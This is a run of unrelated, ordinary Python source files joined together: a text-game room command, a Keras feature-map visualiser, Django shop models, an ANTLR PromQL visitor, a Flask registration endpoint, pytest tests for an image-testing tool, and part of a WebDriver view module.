room. Ex. `list entrances` to list the entrances to the current room. Ex. `list entrances 5` to list the entrances to the room with ID 5.""" def COMMAND(console, args): # Perform initial checks. if not COMMON.check(NAME, console, args, argmax=1): return False # Select the given room or the current room. if len(args) == 1: # Perform argument type checks and casts. roomid = COMMON.check_argtypes(NAME, console, args, checks=[[0, int]], retargs=0) if roomid is None: return False else: roomid = console.user["room"] # Lookup the target room and perform room checks. targetroom = COMMON.check_room(NAME, console, roomid, owner=True) if not targetroom: return False # Are there any entrances? if not targetroom["entrances"]: console.msg("{0}: This room has no entrances.".format(NAME)) return True # Scan the entrance source rooms listed for this room. entcount = 0 for ent in sorted(targetroom["entrances"]): # Lookup the entrance source room and perform room checks. 
srcroom = COMMON.check_room(NAME, console, ent, reason=False) if not srcroom: console.log.error("Entrance source room does not exist for target room: {srcroom} -> {targetroom}", srcroom=ent, targetroom=roomid) console.msg("{0}: ERROR: Entrance room does not exist: {0}".format(NAME, ent)) continue # Enumerate the exits in the entrance source room. exits = [] for ex in enumerate(srcroom["exits"]): if ex[1]["dest"] == targetroom["id"]: exits.append(ex) # Format the entrance source room name and ID. body = "{0} ({1}) :: ".format(srcroom["name"], srcroom["id"]) # Format the names and IDs of the exits in the entrance source room that lead to this room. for ex in exits: body += "{0} ({1}), ".format(ex[1]["name"], ex[0]) # Trim extra ', ' from the end of the line and send it. body = body[:-2] console.msg(body) # Keep count. entcount += 1 # Finished if not entcount: console.msg("{0}: This room has no entrances.".format(NAME)) else: console.msg("{0}: Total entrances: {1}".format(NAME, entcount)) return True 0 import matplotlib.pyplot as plt import matplotlib.image as mpimg from math import sqrt, ceil import numpy as np import random from tensorflow.keras.preprocessing.image import img_to_array, load_img import tensorflow as tf from getdata import get_data, get_random_items import os def print_images(images, title, img_titles = None): ncols = ceil(sqrt(len(images))) nrows = ceil(len(images) / ncols) fig = plt.gcf() fig.canvas.set_window_title(title) # fig.set_size_inches(ncols * 4, nrows * 4) for i, img_path in enumerate(images): # set up subplot sp = plt.subplot(nrows, ncols, i + 1 ) if img_titles: sp.set_title(img_titles[i]) sp.axis('Off') img = mpimg.imread(img_path) plt.imshow(img) plt.show() def print_intermediate_representations(images, model): successive_outputs = [layer.output for layer in model.layers[1:]] visualization_model = tf.keras.models.Model( inputs=model.input, outputs=successive_outputs ) img_path = random.choice(images) img = load_img(img_path, target_size=(300, 300)) x = img_to_array(img) x = x.reshape((1,) + x.shape) x /= 255 successive_feature_maps = visualization_model.predict(x) layer_names = [layer.name for layer in model.layers] for layer_name, feature_map in zip(layer_names, successive_feature_maps): # do this for conv/maxpool layers but not the fully-connected layers if len(feature_map.shape) == 4: n_features = feature_map.shape[-1] # number of features in feature map #the feature map has shape (1, size, size, n_features) size = feature_map.shape[1] display_grid = np.zeros((size, size * n_features)) for i in range(n_features): x = feature_map[0, :, :, i] x -= x.mean() x *= 64 x += 128 x = np.clip(x, 0, 255).astype('uint8') display_grid[:, i*size:(i+1) * size] = x scale = 20.0 / n_features plt.figure(figsize=(scale * n_features, scale)) plt.title(layer_name) plt.grid(False) plt.imshow(display_grid) plt.show() def show_dataset_examples(show: bool, number_of_images = 10): if not show: return horse_dir, human_dir, horse_dir_validation, human_dir_validation = get_data(unzipped=True) horse_names = os.listdir(horse_dir) human_names = os.listdir(human_dir) horse_pics = [os.path.join(horse_dir, name) for name in get_random_items(horse_names, number_of_images)] human_pics = [os.path.join(human_dir, name) for name in get_random_items(human_names, number_of_images)] show_images = horse_pics + human_pics print_images(show_images, "Random Training Images") # display some validation images horse_names = os.listdir(horse_dir_validation) human_names = os.listdir(human_dir_validation) 
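# A minimal, self-contained sketch (synthetic data, not the project's trained model) of
# the per-channel scaling that print_intermediate_representations above applies before
# plotting: centre each conv feature map, rescale it, shift it around 128, clip to the
# displayable 0-255 range, then tile the channels side by side into one grid.
import numpy as np

feature_map = np.random.randn(1, 8, 8, 4)          # stands in for one conv layer's output
size, n_features = feature_map.shape[1], feature_map.shape[-1]
display_grid = np.zeros((size, size * n_features))
for i in range(n_features):
    channel = feature_map[0, :, :, i]
    channel = (channel - channel.mean()) * 64 + 128
    display_grid[:, i * size:(i + 1) * size] = np.clip(channel, 0, 255).astype('uint8')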
horse_pics = [os.path.join(horse_dir_validation, name) for name in get_random_items(horse_names, number_of_images)] human_pics = [os.path.join(human_dir_validation, name) for name in get_random_items(human_names, number_of_images)] show_images = horse_pics + human_pics print_images(show_images, "Random Validation Images") from abc import ABC, abstractmethod class Software(ABC): @abstractmethod def __init__(self, name, type, capacity_consumption, memory_consumption): self.name = name self.type = type self.capacity_consumption = capacity_consumption self.memory_consumption = memory_consumption from django.db import models from django.contrib.auth.models import User # Create your models here. class Customer(models.Model): user = models.OneToOneField(User, null=True, on_delete=models.CASCADE) username = models.CharField(max_length=15, null=True) firstname = models.CharField(max_length=20, null=True) lastname = models.CharField(max_length=20, null=True) phone = models.CharField(max_length=10, null=True) email = models.CharField(max_length=30, null=True) address = models.CharField(max_length=60, null=True) profile_pic = models.ImageField(null=True, blank=True) date_created = models.DateTimeField(auto_now_add = True, null=True) def __str__(self): return self.user.username class Tag(models.Model): name = models.CharField(max_length=200, null=True) def __str__(self): return self.name class Product(models.Model): CATEGORY = ( ('Indoor', 'Indoor'), ('Outdoor', 'Outdoor') ) name = models.CharField(max_length=200, null=True) price = models.FloatField() stock = models.PositiveIntegerField(default=0) category = models.CharField(max_length=200, null=True, choices=CATEGORY) product_pic = models.ImageField(null=True, blank=True) description = models.CharField(max_length=200, null=True, blank=True) date_created = models.DateTimeField(auto_now_add = True, null=True) tags = models.ManyToManyField(Tag) def __str__(self): return self.name class Order(models.Model): STATUS = ( ('Pending', 'Pending'), ('Out for delivery', 'Out for delivery'), ('Delivered','Delivered') ) customer = models.ForeignKey(Customer, null=True, on_delete=models.CASCADE) date_created = models.DateTimeField(auto_now_add = True, null=True) notes = models.CharField(max_length=1000, null=True) status = models.CharField(max_length=200, null=True, choices=STATUS) completed = models.BooleanField(default=False, null=True, blank=True) def __str__(self): return self.customer.user.username + "_" + str(self.id) @property def get_total_items(self): orderItems = self.orderitem_set.all() total_items = sum([item.quantity for item in orderItems]) return total_items @property def get_order_amount(self): orderItems = self.orderitem_set.all() order_amount = sum([item.get_total_price for item in orderItems]) return order_amount class OrderItem(models.Model): order = models.ForeignKey(Order, null=True, blank=True, on_delete=models.CASCADE) product = models.ForeignKey(Product, null=True, blank=True, on_delete=models.SET_NULL) quantity = models.PositiveIntegerField(default=0, null=True, blank=True) date_added = models.DateTimeField(auto_now_add = True) def __str__(self): return self.order.customer.username + "_" + self.product.name @property def get_total_price(self): return self.quantity * self.product.price # Generated from PromQLParser.g4 by ANTLR 4.9.3 from antlr4 import * if __name__ is not None and "." 
in __name__: from .PromQLParser import PromQLParser else: from PromQLParser import PromQLParser # This class defines a complete generic visitor for a parse tree produced by PromQLParser. class PromQLParserVisitor(ParseTreeVisitor): # Visit a parse tree produced by PromQLParser#expression. def visitExpression(self, ctx:PromQLParser.ExpressionContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#vectorOperation. def visitVectorOperation(self, ctx:PromQLParser.VectorOperationContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#unaryOp. def visitUnaryOp(self, ctx:PromQLParser.UnaryOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#powOp. def visitPowOp(self, ctx:PromQLParser.PowOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#multOp. def visitMultOp(self, ctx:PromQLParser.MultOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#addOp. def visitAddOp(self, ctx:PromQLParser.AddOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#compareOp. def visitCompareOp(self, ctx:PromQLParser.CompareOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#andUnlessOp. def visitAndUnlessOp(self, ctx:PromQLParser.AndUnlessOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#orOp. def visitOrOp(self, ctx:PromQLParser.OrOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#subqueryOp. def visitSubqueryOp(self, ctx:PromQLParser.SubqueryOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#offsetOp. def visitOffsetOp(self, ctx:PromQLParser.OffsetOpContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#vector. def visitVector(self, ctx:PromQLParser.VectorContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#parens. def visitParens(self, ctx:PromQLParser.ParensContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#instantSelector. def visitInstantSelector(self, ctx:PromQLParser.InstantSelectorContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#labelMatcher. def visitLabelMatcher(self, ctx:PromQLParser.LabelMatcherContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#labelMatcherOperator. def visitLabelMatcherOperator(self, ctx:PromQLParser.LabelMatcherOperatorContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#labelMatcherList. def visitLabelMatcherList(self, ctx:PromQLParser.LabelMatcherListContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#matrixSelector. def visitMatrixSelector(self, ctx:PromQLParser.MatrixSelectorContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#offset. def visitOffset(self, ctx:PromQLParser.OffsetContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#function_. def visitFunction_(self, ctx:PromQLParser.Function_Context): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#parameter. def visitParameter(self, ctx:PromQLParser.ParameterContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#parameterList. 
def visitParameterList(self, ctx:PromQLParser.ParameterListContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#aggregation. def visitAggregation(self, ctx:PromQLParser.AggregationContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#by. def visitBy(self, ctx:PromQLParser.ByContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#without. def visitWithout(self, ctx:PromQLParser.WithoutContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#grouping. def visitGrouping(self, ctx:PromQLParser.GroupingContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#on_. def visitOn_(self, ctx:PromQLParser.On_Context): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#ignoring. def visitIgnoring(self, ctx:PromQLParser.IgnoringContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#groupLeft. def visitGroupLeft(self, ctx:PromQLParser.GroupLeftContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#groupRight. def visitGroupRight(self, ctx:PromQLParser.GroupRightContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#labelName. def visitLabelName(self, ctx:PromQLParser.LabelNameContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#labelNameList. def visitLabelNameList(self, ctx:PromQLParser.LabelNameListContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#keyword. def visitKeyword(self, ctx:PromQLParser.KeywordContext): return self.visitChildren(ctx) # Visit a parse tree produced by PromQLParser#literal. def visitLiteral(self, ctx:PromQLParser.LiteralContext): return self.visitChildren(ctx) del PromQLParser0 import os, requests from flask import Response, request from .app import create_app from .celery import create_celery from .database import db from .api import create_api_manager from .models import User app = create_app() db.init_app(app) api_manager = create_api_manager(app) celery = create_celery(app) @app.route('/api/users', methods=['POST']) def users_create(): data = request.get_json() username = data.get('username') if username is None: return Response('Username Required', 400) url = 'https://fortnite-public-api.theapinetwork.com/users/id?username={}' res = requests.get(url.format(username), headers={'Authorization': os.getenv('FORTNITE_API_AUTH')}).json() if 'error' in res: return Response('Username invalid or unable to locate your data', 400) uid = res.get('uid') user = User.query.filter_by(uid=uid).first() if user is not None: return Response('This player has already registered on FN Dash', 400) user = User(uid=uid, username=username) db.session.add(user) db.session.commit() return Response(status=201) 0 #!/usr/bin/python import mock import pytest import os import inspect import sys from mock import sentinel @pytest.fixture def Config(): from dibctl import config return config.Config @pytest.fixture def do_tests(): from dibctl import do_tests return do_tests @pytest.fixture def mock_env(Config): return Config({ 'nova': { 'flavor': 'some flavor' } }) @pytest.fixture def mock_image(Config): return Config({ 'tests': { 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'shell': sentinel.path2}] } }) def test_init_no_tests(do_tests): image = {} env = {} dt = do_tests.DoTests(image, env) assert dt.tests_list == [] def 
test_init_no_override(do_tests): image = {} dt = do_tests.DoTests(image, {}, image_uuid=sentinel.uuid) assert dt.tests_list == [] assert dt.delete_image is False assert dt.override_image_uuid == sentinel.uuid def test_init_tests(do_tests, Config): image = Config({ 'tests': { 'tests_list': ['test'] } }) env = Config({}) dt = do_tests.DoTests(image, env) assert dt.tests_list == ['test'] @pytest.mark.parametrize("os_env, img, tenv, combined", [ [{}, {}, {}, {}], [{'a': 'b'}, {}, {}, {'a': 'b'}], [{}, {'a': 'b'}, {}, {'a': 'b'}], [{}, {}, {'a': 'b'}, {'a': 'b'}], [{'a': '1'}, {'a': '2'}, {'a': '3'}, {'a': '3'}], [{'a': '1'}, {'a': '2'}, {}, {'a': '2'}], [{'a': '1', 'b': '1'}, {'a': '2', 'c': '1'}, {'a': '3', 'd': '1'}, {'a': '3', 'b': '1', 'c': '1', 'd': '1'}], ]) def test_make_env_vars(do_tests, Config, os_env, img, tenv, combined): img_cfg = Config({'tests': {'environment_variables': img}}) tenv_cfg = Config({'tests': {'environment_variables': tenv}}) with mock.patch.object(do_tests.os, "environ", os_env): dt = do_tests.DoTests(img_cfg, tenv_cfg) assert dt.environment_variables == combined def test_run_test_bad_config(do_tests): dt = do_tests.DoTests({}, {}) with pytest.raises(do_tests.BadTestConfigError): dt.run_test(sentinel.ssh, {'one': 1, 'two': 2}, sentinel.config, sentinel.env) def test_run_test_bad_runner(do_tests): dt = do_tests.DoTests({}, {}) with pytest.raises(do_tests.BadTestConfigError): dt.run_test(sentinel.ssh, {'badrunner': 1}, sentinel.config, sentinel.env) def test_run_test_duplicate_runner(do_tests): dt = do_tests.DoTests({}, {}) with pytest.raises(do_tests.BadTestConfigError): dt.run_test(sentinel.ssh, {'pytest': 1, 'shell': 2}, sentinel.config, sentinel.env) @pytest.mark.parametrize('continue_on_fail, result, expected', [ [True, False, True], [True, True, True], [False, True, True], [False, False, False], ]) @pytest.mark.parametrize('runner', ['pytest', 'shell']) def test_run_test_matrix(do_tests, runner, continue_on_fail, result, expected): dt = do_tests.DoTests({}, {}, continue_on_fail=continue_on_fail) with mock.patch.multiple(do_tests, pytest_runner=mock.DEFAULT, shell_runner=mock.DEFAULT) as mock_rs: mock_r = mock_rs[runner + '_runner'] mock_r.runner.return_value = result assert dt.run_test(sentinel.ssh, {runner: sentinel.path}, sentinel.config, sentinel.var) is expected assert mock_r.runner.called def test_init_ssh_with_data(do_tests): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'tests_list': [], 'ssh': { 'username': 'user' } } } dt = do_tests.DoTests(image, env) dt.init_ssh(mock.MagicMock()) assert dt.ssh is not None def test_wait_port_good(do_tests, Config): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'tests_list': [], 'wait_for_port': 22, 'port_wait_timeout': 180 } } dt = do_tests.DoTests(Config(image), Config(env)) mock_prep_os = mock.MagicMock() assert dt.wait_port(mock_prep_os) is True assert mock_prep_os.wait_for_port.call_args == mock.call(22, 180) @pytest.mark.parametrize('env_timeout, image_timeout, result', [ [1, 2, 2], [2, 1, 2], ]) def test_get_port_timeout_uses_max(do_tests, Config, env_timeout, image_timeout, result): env = { 'nova': { 'flavor': 'some flavor' }, 'tests': { 'port_wait_timeout': env_timeout } } image = { 'tests': { 'tests_list': [], 'wait_for_port': 22, 'port_wait_timeout': image_timeout } } dt = do_tests.DoTests(Config(image), Config(env)) mock_prep_os = mock.MagicMock() dt.wait_port(mock_prep_os) assert mock_prep_os.wait_for_port.call_args == mock.call(22, result) 
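# A standalone sketch (wait_port_sketch is hypothetical, not dibctl code) of the
# call-recording pattern the tests above rely on: a MagicMock remembers how it was
# called, and comparing call_args against mock.call(...) checks both args and kwargs.
# The tests above use the external 'mock' package; unittest.mock behaves the same way.
from unittest import mock

def wait_port_sketch(prep_os, port, timeout):
    return prep_os.wait_for_port(port, timeout)

mock_prep_os = mock.MagicMock()
wait_port_sketch(mock_prep_os, 22, 180)
assert mock_prep_os.wait_for_port.call_args == mock.call(22, 180)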
@pytest.mark.parametrize('true_value', [ 'was_removed', 'preexisted', 'deletable' ]) def test_report_item_silent(do_tests, true_value, capsys): data = { 'was_removed': False, 'preexisted': False, 'deletable': False, 'id': 'some_id', 'name': '' } data[true_value] = True do_tests.DoTests.report_item('name', data) assert 'will not be removed' not in capsys.readouterr()[0] def test_report_ssh(do_tests, capsys): ssh = mock.MagicMock() ssh.command_line.return_value = ['some', 'command', 'line'] do_tests.DoTests.report_ssh(ssh) assert 'some command line' in capsys.readouterr()[0] def test_report(do_tests, mock_env, mock_image): dt = do_tests.DoTests(mock_image, mock_env) prep_os = mock.MagicMock() mock_status = { 'was_removed': False, 'preexisted': False, 'deletable': False, 'id': 'some_id', 'name': 'some_name' } prep_os.image_status.return_value = mock_status prep_os.instance_status.return_value = mock_status prep_os.keypair_status.return_value = mock_status dt.report(prep_os) def test_report_item(do_tests, capsys): data = { 'was_removed': False, 'preexisted': False, 'deletable': False, 'id': 'some_id', 'name': '' } do_tests.DoTests.report_item('name', data) assert 'will not be removed' in capsys.readouterr()[0] def test_get_port_timeout_uses_env(do_tests, Config): env = { 'nova': { 'flavor': 'some flavor' }, 'tests': { 'port_wait_timeout': 42 } } image = { 'tests': { 'tests_list': [], 'wait_for_port': 22 } } dt = do_tests.DoTests(Config(image), Config(env)) mock_prep_os = mock.MagicMock() dt.wait_port(mock_prep_os) assert mock_prep_os.wait_for_port.call_args == mock.call(22, 42) def test_get_port_timeout_uses_img(do_tests, Config): env = { 'nova': { 'flavor': 'some flavor' }, } image = { 'tests': { 'tests_list': [], 'wait_for_port': 22, 'port_wait_timeout': 42 } } dt = do_tests.DoTests(Config(image), Config(env)) mock_prep_os = mock.MagicMock() dt.wait_port(mock_prep_os) assert mock_prep_os.wait_for_port.call_args == mock.call(22, 42) def test_get_port_timeout_uses_default(do_tests): env = { 'nova': { 'flavor': 'some flavor' }, } image = { 'tests': { 'tests_list': [], 'wait_for_port': 22 } } dt = do_tests.DoTests(image, env) mock_prep_os = mock.MagicMock() dt.wait_port(mock_prep_os) assert mock_prep_os.wait_for_port.call_args == mock.call(22, 61) # magical constant! 
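# A hedged, self-contained sketch (report_item_sketch is hypothetical, not the dibctl
# implementation) of the capsys pattern used by the report tests above: pytest's capsys
# fixture captures stdout so the test can assert on the printed report line.
def report_item_sketch(name, data):
    if not (data.get('was_removed') or data.get('preexisted') or data.get('deletable')):
        print('{0} (id={1}) will not be removed'.format(name, data.get('id')))

def test_report_item_sketch(capsys):
    report_item_sketch('name', {'id': 'some_id'})
    out, _ = capsys.readouterr()
    assert 'will not be removed' in out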
def test_wait_port_no_port(do_tests): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'tests_list': [], } } dt = do_tests.DoTests(image, env) mock_prep_os = mock.MagicMock() assert dt.wait_port(mock_prep_os) is False def test_wait_port_timeout(do_tests): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'tests_list': [], 'wait_for_port': 42 } } dt = do_tests.DoTests(image, env) mock_prep_os = mock.MagicMock() mock_prep_os.wait_for_port.return_value = False with pytest.raises(do_tests.PortWaitError): dt.wait_port(mock_prep_os) @pytest.mark.parametrize('port', [False, 22]) def test_process_minimal(do_tests, port, capsys): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': port, 'tests_list': [] } } dt = do_tests.DoTests(image, env) with mock.patch.object(do_tests.prepare_os, "PrepOS"): assert dt.process(False, False) is True assert 'passed' in capsys.readouterr()[0] def refactor_test_process_port_timeout(do_tests): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': 22, 'tests_list': [] } } dt = do_tests.DoTests(image, env) with mock.patch.object(do_tests.prepare_os, "PrepOS") as mock_prep_os_class: mock_prep_os = mock.MagicMock() mock_prep_os.wait_for_port.return_value = False mock_enter = mock.MagicMock() mock_enter.__enter__.return_value = mock_prep_os mock_prep_os_class.return_value = mock_enter with pytest.raises(do_tests.TestError): dt.process(False, False) def test_process_with_tests(do_tests, capsys): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'shell': sentinel.path2}] } } dt = do_tests.DoTests(image, env) with mock.patch.multiple(do_tests, pytest_runner=mock.DEFAULT, shell_runner=mock.DEFAULT): with mock.patch.object(do_tests.prepare_os, "PrepOS") as mock_prep_os_class: mock_prep_os = mock.MagicMock() mock_enter = mock.MagicMock() mock_enter.__enter__.return_value = mock_prep_os mock_prep_os_class.return_value = mock_enter assert dt.process(False, False) is True def test_process_shell_only(do_tests, capsys): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'shell': sentinel.path2}] } } with mock.patch.object(do_tests.prepare_os, "PrepOS"): with mock.patch.object(do_tests.DoTests, "open_shell", return_value=sentinel.result): dt = do_tests.DoTests(image, env) assert dt.process(shell_only=True, shell_on_errors=False) == sentinel.result def test_process_all_tests_fail(do_tests, capsys, Config): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'pytest': sentinel.path2}] } } dt = do_tests.DoTests(Config(image), Config(env)) dt.ssh = mock.MagicMock() with mock.patch.object(do_tests.pytest_runner, "runner") as runner: runner.side_effect = [False, ValueError("Shouldn't be called")] with mock.patch.object(do_tests.prepare_os, "PrepOS") as mock_prep_os_class: mock_prep_os = mock.MagicMock() mock_enter = mock.MagicMock() mock_enter.__enter__.return_value = mock_prep_os mock_prep_os_class.return_value = mock_enter assert dt.process(False, False) is False assert runner.call_count == 1 def test_process_all_tests_fail_open_shell(do_tests, Config): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'pytest': sentinel.path2}] } } dt = do_tests.DoTests(Config(image), 
Config(env)) dt.ssh = mock.MagicMock() with mock.patch.object(do_tests.pytest_runner, "runner") as runner: runner.side_effect = [False, ValueError("Shouldn't be called")] with mock.patch.object(do_tests.prepare_os, "PrepOS") as mock_prep_os_class: mock_prep_os = mock.MagicMock() mock_enter = mock.MagicMock() mock_enter.__enter__.return_value = mock_prep_os mock_prep_os_class.return_value = mock_enter with mock.patch.object(dt, 'open_shell') as mock_open_shell: assert dt.process(False, shell_on_errors=True) is False assert mock_open_shell.called @pytest.mark.parametrize('result', [True, False]) def test_run_all_tests(do_tests, result, Config): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'pytest': sentinel.path2}] } } with mock.patch.object(do_tests.DoTests, "run_test", return_value=result): dt = do_tests.DoTests(Config(image), Config(env)) dt.ssh = mock.MagicMock() assert dt.run_all_tests(mock.MagicMock()) is result @pytest.mark.parametrize('retval, keep', [ [0, False], [1, False], [42, True] ]) def test_open_shell(do_tests, retval, keep): env = { 'nova': { 'flavor': 'some flavor' } } image = { 'tests': { 'ssh': {'username': 'user'}, 'wait_for_port': 22, 'tests_list': [{'pytest': sentinel.path1}, {'pytest': sentinel.path2}] } } dt = do_tests.DoTests(image, env) mock_ssh = mock.MagicMock() mock_ssh.shell.return_value = retval dt.open_shell(mock_ssh, 'reason') assert dt.keep_failed_instance == keep assert 'exit 42' in mock_ssh.shell.call_args[0][1] def test_open_shell_no_ssh_config(do_tests): env = { 'nova': { 'flavor': 'some flavor' } } image = { } dt = do_tests.DoTests(image, env) with pytest.raises(do_tests.TestError): dt.open_shell(None, 'reason') @pytest.mark.parametrize('kins', [True, False]) @pytest.mark.parametrize('kimg', [True, False]) def test_check_if_keep_stuff_after_fail_code_coverage(do_tests, kins, kimg): env = { 'nova': { 'flavor': 'some flavor' }, } image = { 'tests': { 'tests_list': [], 'wait_for_port': 22 } } dt = do_tests.DoTests(image, env) dt.keep_failed_instance = kins dt.keep_failed_image = kimg dt.check_if_keep_stuff_after_fail(mock.MagicMock()) if __name__ == "__main__": ourfilename = os.path.abspath(inspect.getfile(inspect.currentframe())) currentdir = os.path.dirname(ourfilename) parentdir = os.path.dirname(currentdir) file_to_test = os.path.join( parentdir, os.path.basename(parentdir), os.path.basename(ourfilename).replace("test_", '', 1) ) pytest.main([ "-vv", "--cov", file_to_test, "--cov-report", "term-missing" ] + sys.argv) wuyuehang/crosswalk-webdriver-python __all__ = ["WebViewImpl"] from base.log import VLOG from base.bind import Bind from web_view import WebView from status import * from ui_events import * from js import * from geolocation_override_manager import GeolocationOverrideManager from debugger_tracker import DebuggerTracker from javascript_dialog_manager import JavaScriptDialogManager from navigation_tracker import NavigationTracker from frame_tracker import FrameTracker from devtools_client_impl import DevToolsClientImpl from heap_snapshot_taker import HeapSnapshotTaker from dom_tracker import DomTracker import json import copy # EvaluateScriptReturnType ReturnByValue = 0 ReturnByObject = 1 # return status and context_id def _GetContextIdForFrame(tracker, frame): if not frame: return Status(kOk), 0 (status, context_id) = tracker.GetContextIdForFrame(frame) if status.IsError(): return status, 0 return Status(kOk), context_id def _GetMouseEventAsString(typer): 
if typer == kPressedMouseEventType: return "mousePressed" elif typer == kReleasedMouseEventType: return "mouseReleased" elif typer == kMovedMouseEventType: return "mouseMoved" else: return "" def _GetTouchEventAsString(typer): if typer == kTouchStart: return "touchStart" elif typer == kTouchEnd: return "touchEnd" elif typer == kTouchMove: return "touchMove" else: return "" def _GetMouseButtonAsString(typer): if typer == kLeftMouseButton: return "left" elif typer == kMiddleMouseButton: return "middle" elif typer == kRightMouseButton: return "right" elif typer == kNoneMouseButton: return "none" else: return "" def _GetKeyEventAsString(typer): if typer == kKeyDownEventType: return "keyDown" elif typer == kKeyUpEventType: return "keyUp" elif typer == kRawKeyDownEventType: return "rawKeyDown" elif typer == kCharEventType: return "char" else: return "" def _GetPointStateString(typer): if typer == kTouchStart: return "touchPressed" elif typer == kTouchEnd: return "touchReleased" elif typer == kTouchMove: return "touchMoved" else: return "" # result = response.result.result def _EvaluateScript(client, context_id, expression, return_type, result): params = {} params["expression"] = expression if context_id: params["contextId"] = context_id params["returnByValue"] = (return_type == ReturnByValue) cmd_result = {} status = client.SendCommandAndGetResult("Runtime.evaluate", params, cmd_result) if status.IsError(): return status was_thrown = cmd_result.get("wasThrown", None) if type(was_thrown) != bool: return Status(kUnknownError, "Runtime.evaluate missing 'wasThrown'") if was_thrown: description = cmd_result.get("result.description", "unknown") return Status(kUnknownError, "Runtime.evaluate threw exception: " + description) unscoped_result = {} unscoped_result = cmd_result.get("result") if type(unscoped_result) != dict: return Status(kUnknownError, "evaluate missing dictionary 'result'") result.clear() result.update(unscoped_result) return Status(kOk) # resturn status, got_object and object_id def _EvaluateScriptAndGetObject(client, context_id, expression): result = {} object_id = "" status = _EvaluateScript(client, context_id, expression, ReturnByObject, result) if status.IsError(): return (status, False, object_id) if not result.has_key("objectId"): return (Status(kOk), False, object_id) object_id = result.get("objectId") if type(object_id) != str: return (Status(kUnknownError, "evaluate has invalid 'objectId'"), False, object_id) return (Status(kOk), True, object_id) # result = response.result.result.value def _EvaluateScriptAndGetValue(client, context_id, expression, result): temp_result = {} status = _EvaluateScript(client, context_id, expression, ReturnByValue, temp_result) if status.IsError(): return status typer = temp_result.get("type") if type(typer) != str: return Status(kUnknownError, "Runtime.evaluate missing string 'type'") if typer == "undefined": result.clear() else: if not temp_result.has_key("value"): return Status(kUnknownError, "Runtime.evaluate missing 'value'") result.clear() # packed in a dict to make pass like point if type(temp_result["value"]) != dict: result.update({"value": temp_result["value"]}) else: result.update(temp_result["value"]) return Status(kOk) # return status, found_node and node_id def _GetNodeIdFromFunction(client, context_id, function, args): node_id = -1 try: js = json.dumps(args) except: return (Status(kUnknownError, "json dumps error"), False, node_id) # TODO(wyh): Second null should be array of shadow host ids. 
expression = "(%s).apply(null, [null, %s, %s, true])" % (kCallFunctionScript, function, js) (status, got_object, element_id) = _EvaluateScriptAndGetObject(client, context_id, expression) if status.IsError(): return (status, False, node_id) if not got_object: return (Status(kOk), False, node_id) cmd_result = {} params = {} params["objectId"] = element_id status = client.SendCommandAndGetResult("DOM.requestNode", params, cmd_result) # Release the remote object before doing anything else. params = {} params["objectId"] = element_id release_status = client.SendCommand("Runtime.releaseObject", params) if release_status.IsError(): VLOG(3, "Failed to release remote object: " + release_status.Message()) if status.IsError(): return (status, False, node_id) node_id = cmd_result.get("nodeId") if type(node_id) != int: return (Status(kUnknownError, "DOM.requestNode missing int 'nodeId'"), False, node_id) return (Status(kOk), True, node_id) def _ParseCallFunctionResult(dic, result): if type(dic) != dict: return Status(kUnknownError, "call function result must be a dictionary") status_code = dic.get("status", None) if type(status_code) != int: return Status(kUnknownError, "call function result missing int 'status'") if status_code != kOk: message = dic.get("value", "") return Status(status_code, message) if not dic.has_key("value"): return Status(kUnknownError, "call function result missing 'value'") result.clear() result.update({"value": dic["value"]}) return Status(kOk) class WebViewImpl(WebView): def __init__(self, sid, build_no, client): WebView.__init__(self, sid) self.build_no = build_no self.client = client # in case of casually init 